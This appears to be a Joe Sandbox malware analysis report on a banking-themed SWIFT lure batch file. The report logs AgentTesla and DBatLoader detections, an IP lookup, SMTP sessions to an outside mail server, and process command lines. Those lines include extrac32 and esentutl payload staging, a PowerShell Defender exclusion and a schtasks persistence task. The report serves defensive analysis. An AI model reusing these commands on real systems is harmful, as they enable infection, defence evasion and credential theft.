                                                                                                                              3192.168.2.849718104.26.12.2054437852C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-11 17:02:56 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-11 17:02:56 UTC399INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 11 Nov 2024 17:02:56 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 13
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e0fda54ec7d0ca8-EWR
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2574222&cwnd=251&unsent_bytes=0&cid=13d8de2d2f76e1c4&ts=381&x=0"
                                                                                                                              2024-11-11 17:02:56 UTC13INData Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39
                                                                                                                              Data Ascii: 66.23.206.109


                                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                              Nov 11, 2024 18:02:41.676111937 CET5874970851.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:41.676249981 CET5874970851.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:41.676502943 CET49708587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:02:41.678276062 CET5874970851.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:41.855956078 CET5874970851.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:02:41.856158972 CET49708587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:02:42.024333954 CET5874970851.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:02:44.679507017 CET5874971451.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:44 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:44.679627895 CET49714587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:02:44.846915960 CET5874971451.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:02:44.847193003 CET49714587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:02:45.014750004 CET5874971451.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:02:51.852518082 CET5874971651.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:51 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:51.872674942 CET49716587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:02:52.040124893 CET5874971651.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:02:52.041109085 CET49716587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:02:52.208816051 CET5874971651.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:02:54.524229050 CET5874971751.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:54 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:54.536268950 CET49717587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:02:54.704108953 CET5874971751.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:02:54.704310894 CET49717587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:02:54.872011900 CET5874971751.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:02:58.946044922 CET5874971951.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:58 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:02:58.947397947 CET49719587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:02:59.114902020 CET5874971951.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:02:59.115664005 CET49719587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:02:59.284118891 CET5874971951.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:03:01.937180042 CET5874972051.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:03:01 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:03:01.937777996 CET49720587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:03:02.105014086 CET5874972051.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:03:02.106460094 CET49720587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:03:02.274686098 CET5874972051.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:04:36.553313017 CET5874972451.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:04:36 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:04:36.553467035 CET49724587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:04:36.555336952 CET5874972551.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:04:36 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 11, 2024 18:04:36.555495977 CET49725587192.168.2.851.195.88.199EHLO 377142
                                                                                                                              Nov 11, 2024 18:04:36.720927000 CET5874972451.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:04:36.721096039 CET49724587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:04:36.723057985 CET5874972551.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 377142 [66.23.206.109]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 11, 2024 18:04:36.723264933 CET49725587192.168.2.851.195.88.199STARTTLS
                                                                                                                              Nov 11, 2024 18:04:36.888806105 CET5874972451.195.88.199192.168.2.8220 TLS go ahead
                                                                                                                              Nov 11, 2024 18:04:36.891134024 CET5874972551.195.88.199192.168.2.8220 TLS go ahead

                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:12:02:24
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "
                                                                                                                              Imagebase:0x7ff6ce280000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:12:02:24
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:12:02:24
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\extrac32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                              Imagebase:0x7ff767990000
                                                                                                                              File size:35'328 bytes
                                                                                                                              MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:12:02:25
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'056'768 bytes
                                                                                                                              MD5 hash:BDC3B662D1136F20F51F55A0F6A2FB9D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 24%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:12:02:29
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                                              Imagebase:0xa40000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:12:02:29
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:12:02:30
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                              Imagebase:0x60000
                                                                                                                              File size:352'768 bytes
                                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:12:02:30
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                              Imagebase:0x60000
                                                                                                                              File size:352'768 bytes
                                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:12:02:31
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                                              Imagebase:0x60000
                                                                                                                              File size:352'768 bytes
                                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:12:02:31
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:12:02:31
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:12:02:32
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0xd90000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:12:02:32
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0xe30000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                              Imagebase:0x530000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:17
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:18
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:19
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                              Imagebase:0xf80000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                                              Has exited:false

                                                                                                                              Target ID:20
                                                                                                                              Start time:12:02:35
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""
                                                                                                                              Imagebase:0xa40000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:21
                                                                                                                              Start time:12:02:36
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:22
                                                                                                                              Start time:12:02:36
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:timeout 6
                                                                                                                              Imagebase:0xfe0000
                                                                                                                              File size:25'088 bytes
                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:12:02:37
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Imagebase:0xa90000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:24
                                                                                                                              Start time:12:02:39
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff605670000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              Target ID:26
                                                                                                                              Start time:12:02:43
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'056'768 bytes
                                                                                                                              MD5 hash:BDC3B662D1136F20F51F55A0F6A2FB9D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 24%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:27
                                                                                                                              Start time:12:02:44
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:28
                                                                                                                              Start time:12:02:45
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0x8f0000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
